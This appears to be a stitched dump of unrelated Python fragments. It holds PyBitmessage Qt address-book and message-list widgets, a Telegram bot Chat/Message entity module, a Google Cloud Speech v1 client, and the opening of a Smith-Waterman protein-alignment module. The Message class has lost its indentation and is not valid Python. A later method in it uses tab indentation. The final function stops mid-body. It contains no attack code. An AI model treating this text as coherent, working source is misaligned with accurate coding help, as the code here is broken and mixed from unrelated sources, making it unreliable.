        # No explicit label: resolve one from keys.dat, the addressbook or
        # the subscriptions table, falling back to the raw address.
        newLabel = self.address
        queryreturn = None
        if self.type in (
                AccountMixin.NORMAL,
                AccountMixin.CHAN, AccountMixin.MAILINGLIST):
            try:
                newLabel = unicode(
                    BMConfigParser().get(self.address, 'label'),
                    'utf-8', 'ignore')
            except:
                queryreturn = sqlQuery(
                    '''select label from addressbook where address=?''', self.address)
        elif self.type == AccountMixin.SUBSCRIPTION:
            queryreturn = sqlQuery(
                '''select label from subscriptions where address=?''', self.address)
        if queryreturn:
            for row in queryreturn:
                newLabel = unicode(row[0], 'utf-8', 'ignore')
        self.label = newLabel

    def data(self, role):
        """Return object data (QT UI)"""
        if role == QtCore.Qt.UserRole:
            return self.address
        return super(MessageList_AddressWidget, self).data(role)

    def setData(self, role, value):
        """Set object data"""
        if role == QtCore.Qt.EditRole:
            # The label may have changed elsewhere; re-resolve it.
            self.setLabel()
        return super(MessageList_AddressWidget, self).setData(role, value)

    # label (or address) alphabetically, disabled at the end
    def __lt__(self, other):
        if isinstance(other, MessageList_AddressWidget):
            return self.label.lower() < other.label.lower()
        return super(QtGui.QTableWidgetItem, self).__lt__(other)
class MessageList_SubjectWidget(BMTableWidgetItem):
    """Message list subject item"""

    def __init__(self, subject=None, label=None, unread=False):
        self.setSubject(subject)
        super(MessageList_SubjectWidget, self).__init__(label, unread)

    def setSubject(self, subject):
        """Set subject"""
        self.subject = subject

    def data(self, role):
        """Return object data (QT UI)"""
        if role == QtCore.Qt.UserRole:
            return self.subject
        if role == QtCore.Qt.ToolTipRole:
            # HTML-escape: tooltips are rendered as rich text.
            return escape(unicode(self.subject, 'utf-8'))
        return super(MessageList_SubjectWidget, self).data(role)

    # sort by display label alphabetically
    def __lt__(self, other):
        if isinstance(other, MessageList_SubjectWidget):
            return self.label.lower() < other.label.lower()
        return super(QtGui.QTableWidgetItem, self).__lt__(other)
# In order for the time columns on the Inbox and Sent tabs to be sorted
# correctly (rather than alphabetically), we need to overload the <
# operator and use this class instead of QTableWidgetItem.
class MessageList_TimeWidget(BMTableWidgetItem):
    """
    A subclass of QTableWidgetItem for received (lastactiontime) field.
    '<' operator is overloaded to sort by TimestampRole == 33
    msgid is available by QtCore.Qt.UserRole
    """

    def __init__(self, label=None, unread=False, timestamp=None, msgid=''):
        super(MessageList_TimeWidget, self).__init__(label, unread)
        self.setData(QtCore.Qt.UserRole, QtCore.QByteArray(msgid))
        self.setData(TimestampRole, int(timestamp))

    def __lt__(self, other):
        # Numeric comparison on the stored timestamp, not the label text.
        return self.data(TimestampRole) < other.data(TimestampRole)

    def data(self, role=QtCore.Qt.UserRole):
        """
        Returns expected python types for QtCore.Qt.UserRole and TimestampRole
        custom roles and super for any Qt role
        """
        data = super(MessageList_TimeWidget, self).data(role)
        if role == TimestampRole:
            # QVariant -> int timestamp
            return int(data.toPyObject())
        if role == QtCore.Qt.UserRole:
            # QVariant(QByteArray) -> str msgid
            return str(data.toPyObject())
        return data
class Ui_AddressBookWidgetItem(BMAddressWidget):
    """Addressbook item"""
    # pylint: disable=unused-argument

    def __init__(self, label=None, acc_type=AccountMixin.NORMAL):
        self.type = acc_type
        super(Ui_AddressBookWidgetItem, self).__init__(label=label)

    def data(self, role):
        """Return object data"""
        if role == QtCore.Qt.UserRole:
            return self.type
        return super(Ui_AddressBookWidgetItem, self).data(role)

    def setData(self, role, value):
        """Set data"""
        if role == QtCore.Qt.EditRole:
            self.label = str(
                value.toString().toUtf8()
                if isinstance(value, QtCore.QVariant) else value
            )
            if self.type in (
                    AccountMixin.NORMAL,
                    AccountMixin.MAILINGLIST, AccountMixin.CHAN):
                try:
                    # Own identity: the label lives in keys.dat.
                    BMConfigParser().get(self.address, 'label')
                    BMConfigParser().set(self.address, 'label', self.label)
                    BMConfigParser().save()
                except:
                    # Not an own identity; update the addressbook table instead.
                    sqlExecute('''UPDATE addressbook set label=? WHERE address=?''', self.label, self.address)
            elif self.type == AccountMixin.SUBSCRIPTION:
                sqlExecute('''UPDATE subscriptions set label=? WHERE address=?''', self.label, self.address)
            else:
                pass
        return super(Ui_AddressBookWidgetItem, self).setData(role, value)

    def __lt__(self, other):
        if isinstance(other, Ui_AddressBookWidgetItem):
            reverse = QtCore.Qt.DescendingOrder == \
                self.tableWidget().horizontalHeader().sortIndicatorOrder()
            if self.type == other.type:
                return self.label.lower() < other.label.lower()
            # Keep account-type grouping stable regardless of sort direction.
            return not reverse if self.type < other.type else reverse
        return super(QtGui.QTableWidgetItem, self).__lt__(other)
class Ui_AddressBookWidgetItemLabel(Ui_AddressBookWidgetItem):
    """Addressbook label item"""

    def __init__(self, address, label, acc_type):
        self.address = address
        super(Ui_AddressBookWidgetItemLabel, self).__init__(label, acc_type)

    def data(self, role):
        """Return object data"""
        # Refresh the label on every access so edits made elsewhere show up.
        self.label = self.defaultLabel()
        return super(Ui_AddressBookWidgetItemLabel, self).data(role)
class Ui_AddressBookWidgetItemAddress(Ui_AddressBookWidgetItem):
    """Addressbook address item"""

    def __init__(self, address, label, acc_type):
        self.address = address
        # The address column uses the address itself as its display label.
        super(Ui_AddressBookWidgetItemAddress, self).__init__(address, acc_type)

    def data(self, role):
        """Return object data"""
        if role == QtCore.Qt.ToolTipRole:
            return self.address
        if role == QtCore.Qt.DecorationRole:
            # No avatar in the address column.
            return None
        return super(Ui_AddressBookWidgetItemAddress, self).data(role)
class AddressBookCompleter(QtGui.QCompleter):
    """Addressbook completer"""

    def __init__(self):
        super(AddressBookCompleter, self).__init__()
        # Saved cursor position; -1 means "nothing saved".
        self.cursorPos = -1

    def onCursorPositionChanged(self, oldPos, newPos):  # pylint: disable=unused-argument
        """Callback for cursor position change"""
        if oldPos != self.cursorPos:
            self.cursorPos = -1

    def splitPath(self, path):
        """Split on semicolon"""
        text = unicode(path.toUtf8(), 'utf-8')
        # Complete only the ';'-separated fragment the cursor is in.
        return [text[:self.widget().cursorPosition()].split(';')[-1].strip()]

    def pathFromIndex(self, index):
        """Perform autocompletion (reimplemented QCompleter method)"""
        autoString = unicode(
            index.data(QtCore.Qt.EditRole).toString().toUtf8(), 'utf-8')
        text = unicode(self.widget().text().toUtf8(), 'utf-8')

        # If cursor position was saved, restore it, else save it
        if self.cursorPos != -1:
            self.widget().setCursorPosition(self.cursorPos)
        else:
            self.cursorPos = self.widget().cursorPosition()

        # Get current position
        curIndex = self.widget().cursorPosition()

        # prev_delimiter_index should actually point at final white space
        # AFTER the delimiter
        # Get index of last delimiter before current position
        prevDelimiterIndex = text[0:curIndex].rfind(";")
        # NOTE(review): if the delimiter (or trailing spaces) reaches the end
        # of the string, text[prevDelimiterIndex + 1] can raise IndexError —
        # confirm the widget's input guarantees prevent this.
        while text[prevDelimiterIndex + 1] == " ":
            prevDelimiterIndex += 1

        # Get index of first delimiter after current position
        # (or EOL if no delimiter after cursor)
        nextDelimiterIndex = text.find(";", curIndex)
        if nextDelimiterIndex == -1:
            nextDelimiterIndex = len(text)

        # Get part of string that occurs before cursor
        part1 = text[0:prevDelimiterIndex + 1]

        # Get string value from before auto finished string is selected
        # pre = text[prevDelimiterIndex + 1:curIndex - 1]

        # Get part of string that occurs AFTER cursor
        part2 = text[nextDelimiterIndex:]

        return part1 + autoString + part2
| |
from tgbot.entities import *
from tgbot.entities.files import *
from tgbot.entities.location import *
class Chat(RequestingEntity):
    """A Telegram chat; wraps the Bot API calls that target a single chat.

    Every request helper requires both a chat id and an api handle; the
    shared guard raises otherwise.
    """

    def __init__(self, api):
        RequestingEntity.__init__(self, {
            "id": ("id", None),
            "type": ("type", None),
            "title": ("title", None),
            "username": ("username", None),
            "first_name": ("first_name", None),
            "last_name": ("last_name", None)
        }, api)

    def _check_usable(self):
        # Shared precondition for all request helpers below.
        if self.id is None or self.api is None:
            raise Exception("Can't send API requests with this chat instance")

    def send_message(self, text = "", parse_mode = None, disable_web_page_review = False, disable_notification = False, reply_to_message = None, reply_markup = None):
        """Send a text message to this chat."""
        self._check_usable()
        return self.api.send_message(
            chat_id = self.id,
            text = text,
            parse_mode = parse_mode,
            disable_web_page_review = disable_web_page_review,
            disable_notification = disable_notification,
            reply_to_message_id = reply_to_message.id if reply_to_message is not None else None,
            reply_markup = reply_markup.json() if reply_markup is not None else None)

    def send_photo(self, photo, caption = None, disable_notification = False, reply_markup = None):
        """Send a photo to this chat."""
        self._check_usable()
        return self.api.send_photo(
            chat_id = self.id,
            photo = photo,
            caption = caption,
            disable_notification = disable_notification,
            reply_markup = reply_markup.json() if reply_markup is not None else None)

    def send_audio(self, audio, duration = None, performer = None, title = None, disable_notification = False, reply_markup = None):
        """Send an audio file to this chat."""
        self._check_usable()
        return self.api.send_audio(
            chat_id = self.id,
            audio = audio,
            duration = duration,
            performer = performer,
            title = title,
            disable_notification = disable_notification,
            reply_markup = reply_markup.json() if reply_markup is not None else None)

    def send_document(self, document, caption = None, disable_notification = False, reply_markup = None):
        """Send a generic document to this chat."""
        self._check_usable()
        return self.api.send_document(
            chat_id = self.id,
            document = document,
            caption = caption,
            disable_notification = disable_notification,
            reply_markup = reply_markup.json() if reply_markup is not None else None)

    def send_sticker(self, sticker, disable_notification = False, reply_markup = None):
        """Send a sticker to this chat."""
        self._check_usable()
        return self.api.send_sticker(
            chat_id = self.id,
            sticker = sticker,
            disable_notification = disable_notification,
            reply_markup = reply_markup.json() if reply_markup is not None else None)

    def send_video(self, video, duration = None, width = None, height = None, caption = None, disable_notification = False, reply_markup = None):
        """Send a video to this chat."""
        self._check_usable()
        return self.api.send_video(
            chat_id = self.id,
            video = video,
            duration = duration,
            width = width,
            height = height,
            caption = caption,
            disable_notification = disable_notification,
            reply_markup = reply_markup.json() if reply_markup is not None else None)

    def send_voice(self, voice, duration = None, disable_notification = False, reply_markup = None):
        """Send a voice note to this chat."""
        self._check_usable()
        return self.api.send_voice(
            chat_id = self.id,
            voice = voice,
            duration = duration,
            disable_notification = disable_notification,
            reply_markup = reply_markup.json() if reply_markup is not None else None)

    def send_location(self, longitude, latitude, disable_notification = False, reply_markup = None):
        """Send a map point to this chat."""
        self._check_usable()
        return self.api.send_location(
            chat_id = self.id,
            longitude = longitude,
            latitude = latitude,
            disable_notification = disable_notification,
            reply_markup = reply_markup.json() if reply_markup is not None else None)

    def send_venue(self, longitude, latitude, title, address, foursquare_id = None, disable_notification = False, reply_markup = None):
        """Send a venue (location with title/address) to this chat."""
        self._check_usable()
        return self.api.send_venue(
            chat_id = self.id,
            longitude = longitude,
            latitude = latitude,
            title = title,
            address = address,
            foursquare_id = foursquare_id,
            disable_notification = disable_notification,
            reply_markup = reply_markup.json() if reply_markup is not None else None)

    def send_contact(self, phone_number, first_name, last_name = None, disable_notification = False, reply_markup = None):
        """Send a phone contact to this chat."""
        self._check_usable()
        return self.api.send_contact(
            chat_id = self.id,
            phone_number = phone_number,
            first_name = first_name,
            last_name = last_name,
            disable_notification = disable_notification,
            reply_markup = reply_markup.json() if reply_markup is not None else None)

    def send_action(self, action):
        """Broadcast a chat action ("typing", "upload_photo", ...)."""
        self._check_usable()
        return self.api.send_chat_action(chat_id = self.id, action = action)

    def leave(self):
        """Make the bot leave this chat."""
        self._check_usable()
        return self.api.leave_chat(chat_id = self.id)

    def kick(self, user):
        """Kick (ban) *user* from this chat."""
        self._check_usable()
        return self.api.kick_chat_member(chat_id = self.id, user_id = user.id)

    def unban(self, user):
        """Lift a ban for *user* in this chat.

        Fixed: the parameter was mistakenly named ``Self`` (capital S), so
        the body's references to ``self`` raised NameError at call time.
        """
        self._check_usable()
        return self.api.unban_chat_member(chat_id = self.id, user_id = user.id)
class User(Entity):
    """A Telegram user: id plus name/username fields, all defaulting to None."""

    def __init__(self):
        Entity.__init__(self, {
            "id": ("id", None),
            "first_name": ("first_name", None),
            "last_name": ("last_name", None),
            "username": ("username", None)
        })
class MessageEntity(Entity):
    """An annotated span (mention, url, text_mention, ...) inside a message."""

    def __init__(self):
        Entity.__init__(self, {
            "type": ("type", None),
            "offset": ("offset", None),
            "length": ("length", None),
            "url": ("url", None),
        })

    def _set_props(self, values = None):
        """Populate fields from a Bot API dict; a nested "user" becomes a User."""
        # Fixed: None sentinel instead of a mutable `{}` default argument,
        # which Python evaluates once and shares across calls.
        values = {} if values is None else values
        Entity._set_props(self, values)
        self.user = User.build(values["user"]) if "user" in values else None
class Message(RequestingEntity):
def __init__(self, api):
RequestingEntity.__init__(self, {
"id": ("message_id", None),
"date": ("date", 0),
"forward_date": ("forward_date", None),
"edit_date": ("edit_date", None),
"text": ("text", ""),
"caption": ("caption", None),
"new_chat_title": ("new_chat_title", None),
"delete_chat_photo": ("delete_chat_photo", False),
"group_chat_created": ("group_chat_created", False),
"supergroup_chat_created": ("supergroup_chat_created", False),
"channel_chat_created": ("channel_chat_created", False),
"migrate_to_chat_id": ("migrate_to_chat_id", None),
"migrate_from_chat_id": ("migrate_from_chat_id", None),
}, api)
def _update_msg_cb(self, message):
self.text = message.text
self.caption = message.caption
def forward(self, to_chat, disable_notification = False):
if self.api == None or self.id == None:
raise Exception("This message is not sent")
return self.api.forward_message(
chat_id = to_chat.id,
from_chat_id = self.chat_id,
disable_notification = disable_notification,
message_id = self.id)
def reply(self, text = "", parse_mode = None, disable_web_page_review = False, disable_notification = False, reply_markup = None):
if self.api == None or self.id == None:
raise Exception("This message is not sent")
return self.api.send_message(
chat_id = self.chat_id,
text = text,
parse_mode = parse_mode,
disable_web_page_review = disable_web_page_review,
disable_notification = disable_notification,
reply_to_message_id = self.id,
reply_markup = reply_markup.json() if reply_markup != None else None)
def edit_text(self, text, parse_mode = None, reply_markup = None):
if self.api == None or self.id == None:
raise Exception("This message is not sent")
return self.api.edit_message_text(
chat_id = self.chat_id,
message_id = self.id,
text = text,
parse_mode = parse_mode,
reply_markup = reply_markup.json() if reply_markup != None else None).then(self._update_msg_cb)
def edit_caption(self, caption, reply_markup = None):
if self.api == None or self.id == None:
raise Exception("This message is not sent")
return self.api.edit_message_caption(
chat_id = self.chat_id,
message_id = self.id,
caption = caption,
reply_markup = reply_markup.json() if reply_markup != None else None).then(self._update_msg_cb)
def edit_reply_markup(self, reply_markup):
if self.api == None or self.id == None:
raise Exception("This message is not sent")
return self.api.edit_message_reply_markup(
chat_id = self.chat_id,
message_id = self.id,
reply_markup = reply_markup.json())
def is_service_message(self):
return False #TODO
def is_forwarded(self):
return self.forward_from_chat != None
def is_reply(self):
return self.reply_to_message != None
def is_photo(self):
return len(self.photo) > 0
def is_audio(self):
return self.audio != None
def is_document(self):
return self.document != None
def is_sticker(self):
return self.sticker != None
def is_video(self):
return self.video != None
def is_voice(self):
return self.voice != None
def is_location(self):
return self.location != None
def is_venue(self):
return self.venue != None
	def _set_props(self, values = {}):
		"""Populate this message's fields from a Telegram API message dict.

		Missing keys reset the corresponding attribute to None (or [] for
		the list-valued fields).  NOTE(review): `values={}` is a mutable
		default argument; harmless here since it is only read, never
		mutated, but `values=None` would be safer.
		"""
		RequestingEntity._set_props(self, values)
		# Telegram nests the ids: chat id under "chat", sender id under "from".
		self.chat_id = values["chat"]["id"] if "chat" in values else None
		self.user_id = values["from"]["id"] if "from" in values else None
		self.forward_from = User.build(values["forward_from"]) if "forward_from" in values else None
		self.forward_from_chat = Chat.build(values["forward_from_chat"]) if "forward_from_chat" in values else None
		# reply_to_message is itself a full Message, built recursively and
		# sharing this message's api handle.
		self.reply_to_message = Message.build(values["reply_to_message"], self.api) if "reply_to_message" in values else None
		self.entities = [MessageEntity.build(me_data) for me_data in values["entities"]] if "entities" in values else []
		self.audio = Audio.build(values["audio"], self.api) if "audio" in values else None
		self.document = Document.build(values["document"], self.api) if "document" in values else None
		# "photo" holds several PhotoSize thumbnails of the same image.
		self.photo = [PhotoSize.build(photosize_data, self.api) for photosize_data in values["photo"]] if "photo" in values else []
		self.sticker = Sticker.build(values["sticker"], self.api) if "sticker" in values else None
		self.video = Video.build(values["video"], self.api) if "video" in values else None
		self.voice = Voice.build(values["voice"], self.api) if "voice" in values else None
		self.location = Location.build(values["location"]) if "location" in values else None
		self.venue = Venue.build(values["venue"]) if "venue" in values else None
| |
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.cloud.speech.v1 Speech API."""
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import google.api_core.operation
import google.api_core.operations_v1
import google.api_core.protobuf_helpers
import grpc
from google.cloud.speech_v1.gapic import enums
from google.cloud.speech_v1.gapic import speech_client_config
from google.cloud.speech_v1.gapic.transports import speech_grpc_transport
from google.cloud.speech_v1.proto import cloud_speech_pb2
from google.cloud.speech_v1.proto import cloud_speech_pb2_grpc
from google.longrunning import operations_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-speech").version
class SpeechClient(object):
    """Service that implements Google Cloud Speech API."""
    SERVICE_ADDRESS = "speech.googleapis.com:443"
    """The default address of the service."""
    # The name of the interface for this client. This is the key used to
    # find the method configuration in the client_config dictionary.
    _INTERFACE_NAME = "google.cloud.speech.v1.Speech"
    @classmethod
    def from_service_account_file(cls, filename, *args, **kwargs):
        """Creates an instance of this client using the provided credentials
        file.
        Args:
            filename (str): The path to the service account private key json
                file.
            args: Additional arguments to pass to the constructor.
            kwargs: Additional arguments to pass to the constructor.
        Returns:
            SpeechClient: The constructed client.
        """
        credentials = service_account.Credentials.from_service_account_file(filename)
        kwargs["credentials"] = credentials
        return cls(*args, **kwargs)
    # Alias kept for backward compatibility: earlier releases exposed the
    # JSON-named constructor.
    from_service_account_json = from_service_account_file
    def __init__(
        self,
        transport=None,
        channel=None,
        credentials=None,
        client_config=None,
        client_info=None,
    ):
        """Constructor.
        Args:
            transport (Union[~.SpeechGrpcTransport,
                    Callable[[~.Credentials, type], ~.SpeechGrpcTransport]): A transport
                instance, responsible for actually making the API calls.
                The default transport uses the gRPC protocol.
                This argument may also be a callable which returns a
                transport instance. Callables will be sent the credentials
                as the first argument and the default transport class as
                the second argument.
            channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
                through which to make calls. This argument is mutually exclusive
                with ``credentials``; providing both will raise an exception.
            credentials (google.auth.credentials.Credentials): The
                authorization credentials to attach to requests. These
                credentials identify this application to the service. If none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
                This argument is mutually exclusive with providing a
                transport instance to ``transport``; doing so will raise
                an exception.
            client_config (dict): DEPRECATED. A dictionary of call options for
                each method. If not specified, the default configuration is used.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
        """
        # Raise deprecation warnings for things we want to go away.
        if client_config is not None:
            warnings.warn(
                "The `client_config` argument is deprecated.",
                PendingDeprecationWarning,
                stacklevel=2,
            )
        else:
            client_config = speech_client_config.config
        if channel:
            warnings.warn(
                "The `channel` argument is deprecated; use " "`transport` instead.",
                PendingDeprecationWarning,
                stacklevel=2,
            )
        # Instantiate the transport.
        # The transport is responsible for handling serialization and
        # deserialization and actually sending data to the service.
        if transport:
            if callable(transport):
                # A transport factory: give it the credentials and the
                # default transport class to construct from.
                self.transport = transport(
                    credentials=credentials,
                    default_class=speech_grpc_transport.SpeechGrpcTransport,
                )
            else:
                if credentials:
                    raise ValueError(
                        "Received both a transport instance and "
                        "credentials; these are mutually exclusive."
                    )
                self.transport = transport
        else:
            self.transport = speech_grpc_transport.SpeechGrpcTransport(
                address=self.SERVICE_ADDRESS, channel=channel, credentials=credentials
            )
        if client_info is None:
            client_info = google.api_core.gapic_v1.client_info.ClientInfo(
                gapic_version=_GAPIC_LIBRARY_VERSION
            )
        else:
            # Caller-supplied client_info still reports this library version.
            client_info.gapic_version = _GAPIC_LIBRARY_VERSION
        self._client_info = client_info
        # Parse out the default settings for retry and timeout for each RPC
        # from the client configuration.
        # (Ordinarily, these are the defaults specified in the `*_config.py`
        # file next to this one.)
        self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
            client_config["interfaces"][self._INTERFACE_NAME]
        )
        # Save a dictionary of cached API call functions.
        # These are the actual callables which invoke the proper
        # transport methods, wrapped with `wrap_method` to add retry,
        # timeout, and the like.
        self._inner_api_calls = {}
    # Service calls
    def recognize(
        self,
        config,
        audio,
        retry=google.api_core.gapic_v1.method.DEFAULT,
        timeout=google.api_core.gapic_v1.method.DEFAULT,
        metadata=None,
    ):
        """
        Performs synchronous speech recognition: receive results after all audio
        has been sent and processed.
        Example:
            >>> from google.cloud import speech_v1
            >>> from google.cloud.speech_v1 import enums
            >>>
            >>> client = speech_v1.SpeechClient()
            >>>
            >>> encoding = enums.RecognitionConfig.AudioEncoding.FLAC
            >>> sample_rate_hertz = 44100
            >>> language_code = 'en-US'
            >>> config = {'encoding': encoding, 'sample_rate_hertz': sample_rate_hertz, 'language_code': language_code}
            >>> uri = 'gs://bucket_name/file_name.flac'
            >>> audio = {'uri': uri}
            >>>
            >>> response = client.recognize(config, audio)
        Args:
            config (Union[dict, ~google.cloud.speech_v1.types.RecognitionConfig]): *Required* Provides information to the recognizer that specifies how to
                process the request.
                If a dict is provided, it must be of the same form as the protobuf
                message :class:`~google.cloud.speech_v1.types.RecognitionConfig`
            audio (Union[dict, ~google.cloud.speech_v1.types.RecognitionAudio]): *Required* The audio data to be recognized.
                If a dict is provided, it must be of the same form as the protobuf
                message :class:`~google.cloud.speech_v1.types.RecognitionAudio`
            retry (Optional[google.api_core.retry.Retry]): A retry object used
                to retry requests. If ``None`` is specified, requests will not
                be retried.
            timeout (Optional[float]): The amount of time, in seconds, to wait
                for the request to complete. Note that if ``retry`` is
                specified, the timeout applies to each individual attempt.
            metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
                that is provided to the method.
        Returns:
            A :class:`~google.cloud.speech_v1.types.RecognizeResponse` instance.
        Raises:
            google.api_core.exceptions.GoogleAPICallError: If the request
                failed for any reason.
            google.api_core.exceptions.RetryError: If the request failed due
                to a retryable error and retry attempts failed.
            ValueError: If the parameters are invalid.
        """
        # Wrap the transport method to add retry and timeout logic.
        if "recognize" not in self._inner_api_calls:
            self._inner_api_calls[
                "recognize"
            ] = google.api_core.gapic_v1.method.wrap_method(
                self.transport.recognize,
                default_retry=self._method_configs["Recognize"].retry,
                default_timeout=self._method_configs["Recognize"].timeout,
                client_info=self._client_info,
            )
        request = cloud_speech_pb2.RecognizeRequest(config=config, audio=audio)
        return self._inner_api_calls["recognize"](
            request, retry=retry, timeout=timeout, metadata=metadata
        )
    def long_running_recognize(
        self,
        config,
        audio,
        retry=google.api_core.gapic_v1.method.DEFAULT,
        timeout=google.api_core.gapic_v1.method.DEFAULT,
        metadata=None,
    ):
        """
        Performs asynchronous speech recognition: receive results via the
        google.longrunning.Operations interface. Returns either an
        ``Operation.error`` or an ``Operation.response`` which contains a
        ``LongRunningRecognizeResponse`` message.
        Example:
            >>> from google.cloud import speech_v1
            >>> from google.cloud.speech_v1 import enums
            >>>
            >>> client = speech_v1.SpeechClient()
            >>>
            >>> encoding = enums.RecognitionConfig.AudioEncoding.FLAC
            >>> sample_rate_hertz = 44100
            >>> language_code = 'en-US'
            >>> config = {'encoding': encoding, 'sample_rate_hertz': sample_rate_hertz, 'language_code': language_code}
            >>> uri = 'gs://bucket_name/file_name.flac'
            >>> audio = {'uri': uri}
            >>>
            >>> response = client.long_running_recognize(config, audio)
            >>>
            >>> def callback(operation_future):
            ...     # Handle result.
            ...     result = operation_future.result()
            >>>
            >>> response.add_done_callback(callback)
            >>>
            >>> # Handle metadata.
            >>> metadata = response.metadata()
        Args:
            config (Union[dict, ~google.cloud.speech_v1.types.RecognitionConfig]): *Required* Provides information to the recognizer that specifies how to
                process the request.
                If a dict is provided, it must be of the same form as the protobuf
                message :class:`~google.cloud.speech_v1.types.RecognitionConfig`
            audio (Union[dict, ~google.cloud.speech_v1.types.RecognitionAudio]): *Required* The audio data to be recognized.
                If a dict is provided, it must be of the same form as the protobuf
                message :class:`~google.cloud.speech_v1.types.RecognitionAudio`
            retry (Optional[google.api_core.retry.Retry]): A retry object used
                to retry requests. If ``None`` is specified, requests will not
                be retried.
            timeout (Optional[float]): The amount of time, in seconds, to wait
                for the request to complete. Note that if ``retry`` is
                specified, the timeout applies to each individual attempt.
            metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
                that is provided to the method.
        Returns:
            A :class:`~google.cloud.speech_v1.types._OperationFuture` instance.
        Raises:
            google.api_core.exceptions.GoogleAPICallError: If the request
                failed for any reason.
            google.api_core.exceptions.RetryError: If the request failed due
                to a retryable error and retry attempts failed.
            ValueError: If the parameters are invalid.
        """
        # Wrap the transport method to add retry and timeout logic.
        if "long_running_recognize" not in self._inner_api_calls:
            self._inner_api_calls[
                "long_running_recognize"
            ] = google.api_core.gapic_v1.method.wrap_method(
                self.transport.long_running_recognize,
                default_retry=self._method_configs["LongRunningRecognize"].retry,
                default_timeout=self._method_configs["LongRunningRecognize"].timeout,
                client_info=self._client_info,
            )
        request = cloud_speech_pb2.LongRunningRecognizeRequest(
            config=config, audio=audio
        )
        operation = self._inner_api_calls["long_running_recognize"](
            request, retry=retry, timeout=timeout, metadata=metadata
        )
        # Wrap the raw operation in a future that deserializes the
        # response/metadata protos when the operation completes.
        return google.api_core.operation.from_gapic(
            operation,
            self.transport._operations_client,
            cloud_speech_pb2.LongRunningRecognizeResponse,
            metadata_type=cloud_speech_pb2.LongRunningRecognizeMetadata,
        )
    def streaming_recognize(
        self,
        requests,
        retry=google.api_core.gapic_v1.method.DEFAULT,
        timeout=google.api_core.gapic_v1.method.DEFAULT,
        metadata=None,
    ):
        """
        Performs bidirectional streaming speech recognition: receive results while
        sending audio. This method is only available via the gRPC API (not REST).
        EXPERIMENTAL: This method interface might change in the future.
        Example:
            >>> from google.cloud import speech_v1
            >>>
            >>> client = speech_v1.SpeechClient()
            >>>
            >>> request = {}
            >>>
            >>> requests = [request]
            >>> for element in client.streaming_recognize(requests):
            ...     # process element
            ...     pass
        Args:
            requests (iterator[dict|google.cloud.speech_v1.proto.cloud_speech_pb2.StreamingRecognizeRequest]): The input objects. If a dict is provided, it must be of the
                same form as the protobuf message :class:`~google.cloud.speech_v1.types.StreamingRecognizeRequest`
            retry (Optional[google.api_core.retry.Retry]): A retry object used
                to retry requests. If ``None`` is specified, requests will not
                be retried.
            timeout (Optional[float]): The amount of time, in seconds, to wait
                for the request to complete. Note that if ``retry`` is
                specified, the timeout applies to each individual attempt.
            metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
                that is provided to the method.
        Returns:
            Iterable[~google.cloud.speech_v1.types.StreamingRecognizeResponse].
        Raises:
            google.api_core.exceptions.GoogleAPICallError: If the request
                failed for any reason.
            google.api_core.exceptions.RetryError: If the request failed due
                to a retryable error and retry attempts failed.
            ValueError: If the parameters are invalid.
        """
        # Wrap the transport method to add retry and timeout logic.
        if "streaming_recognize" not in self._inner_api_calls:
            self._inner_api_calls[
                "streaming_recognize"
            ] = google.api_core.gapic_v1.method.wrap_method(
                self.transport.streaming_recognize,
                default_retry=self._method_configs["StreamingRecognize"].retry,
                default_timeout=self._method_configs["StreamingRecognize"].timeout,
                client_info=self._client_info,
            )
        # Unlike the unary calls, the request iterator is passed straight
        # through to the gRPC stream.
        return self._inner_api_calls["streaming_recognize"](
            requests, retry=retry, timeout=timeout, metadata=metadata
        )
| |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Smith-Waterman functions for protein alignment in NumPy."""
from typing import Optional
import numpy as np
from scipy import special
def _alignment_matrices(len_1, len_2, i = 0, j = 0,
curr = "M", prev = "S",
alignment = None):
"""Helper function for alignment_matrices."""
if alignment is None:
alignment = np.zeros((len_1, len_2, 9))
# M=match, X=gap_x, Y=gap_y
lookup = {
("S", "M"): 0,
("M", "M"): 1,
("X", "M"): 2,
("Y", "M"): 3,
("M", "X"): 4,
("X", "X"): 5,
("M", "Y"): 6,
("X", "Y"): 7,
("Y", "Y"): 8,
}
alignment[i, j, lookup[(prev, curr)]] = 1
if curr == "M":
yield alignment
if i < len_1 - 1:
# We can go down.
yield from _alignment_matrices(len_1, len_2, i=i+1, j=j, curr="Y",
prev=curr, alignment=alignment.copy())
if i < len_1 - 1 and j < len_2 - 1:
# We can go in diagonal.
yield from _alignment_matrices(len_1, len_2, i=i+1, j=j+1, curr="M",
prev=curr, alignment=alignment.copy())
if j < len_2 - 1 and curr != "Y":
# We can go right.
yield from _alignment_matrices(len_1, len_2, i=i, j=j+1,
curr="X", prev=curr,
alignment=alignment.copy())
def alignment_matrices(len_1, len_2):
  """Generator of all alignment matrices of shape (len_1, len_2, 9).

  Args:
    len_1: length of first sequence.
    len_2: length of second sequence.

  Yields:
    All alignment matrices of shape (len_1, len_2, 9), enumerated from
    every possible starting cell.
  """
  starts = ((row, col) for row in range(len_1) for col in range(len_2))
